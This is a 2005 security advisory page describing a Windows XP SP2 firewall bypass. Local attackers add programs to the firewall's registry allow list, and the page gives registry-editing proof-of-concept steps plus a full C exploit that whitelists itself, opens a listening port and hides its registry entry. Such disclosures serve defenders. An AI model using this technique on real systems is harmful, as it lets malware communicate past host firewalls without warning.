Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Windows XP Firewall Bypassing (Registry Based) 12 Sep. 2005    Summary Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.   Credit: The information has been provided by Mark Kica. The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Microsoft Windows XP SP2 Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker. If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning. Proof of Concept: Launch the regedit.exe program and access the keys found under the following path: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List Add an entry key such as this one: Name: C:\chat.exe Value: C:\chat.exe:*:Enabled:chat Exploit: #include <stdio.h> #include <windows.h> #include <ezsocket.h> #include <conio.h> #include "Shlwapi.h" int main( int argc, char *argv [] )     {     char buffer[1024];     char filename[1024];     HKEY hKey;     int i;     GetModuleFileName(NULL, filename, 1024);     strcpy(buffer, filename);     strcat(buffer, ":*:Enabled:");     strcat(buffer, "bugg");     RegOpenKeyEx(        HKEY_LOCAL_MACHINE,        "SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",        0,        KEY_ALL_ACCESS,        &hKey);     RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));          int temp, sockfd, new_fd, fd_size;     struct sockaddr_in remote_addr;     fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");     fprintf(stdout, " This is not trojan \n");     fprintf(stdout, " Opened port is :2001 \n");     fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");     fprintf(stdout, "Dedicated to Katka H. from Levoca \n");     sleep(3);     if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)         return 0;              for (; ; )         {         RegDeleteValue(hKey, filename);           fd_size = sizeof(struct sockaddr_in);         if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)             {             perror("accept");             continue;             }         temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);         fprintf(stdout, "Sended: Hello World\r\n");         temp = recv(new_fd, buffer, 1024, 0);         buffer[temp] = '\0';         fprintf(stdout, "Recieved: %s\r\n", buffer);         ezclose_socket(new_fd);         RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));         if (!strcmp(buffer, "quit"))             break;         }     ezsocket_exit();    return 0;     } /* EoF */  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Novell Zenworks Software Packaging LaunchHelp.dll Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Microsoft Internet Explorer swapNode Handling Code Execution Vulnerability Microsoft Internet Explorer Select Element Insufficient Type Checking Code Execution Vulnerability Internet Explorer Select Element Cache Code Execution Vulnerability Microsoft Office Graph DataFormat Signed Index Code Execution Vulnerability Microsoft Office Excel Conditional Expression Ptg Type Confusion Vulnerability Microsoft Internet Explorer Protected Mode Bypass Vulnerability Microsoft Internet Explorer 9 STYLE Object Parsing Code Execution Vulnerability Microsoft Internet Explorer XSLT SetViewSlave Code Execution Vulnerability CA Total Defense Suite Gateway Security Malformed HTTP Packet Code Execution Vulnerability HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Code Execution Vulnerability TrendMicro Control Manager CASProcessor.exe BLOB Code Execution Vulnerability Symantec Veritas Storage Foundation vxsvc.exe Unicode Code Execution Vulnerability HP iNode Management Center iNodeMngChecker.exe Code Execution Vulnerability  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®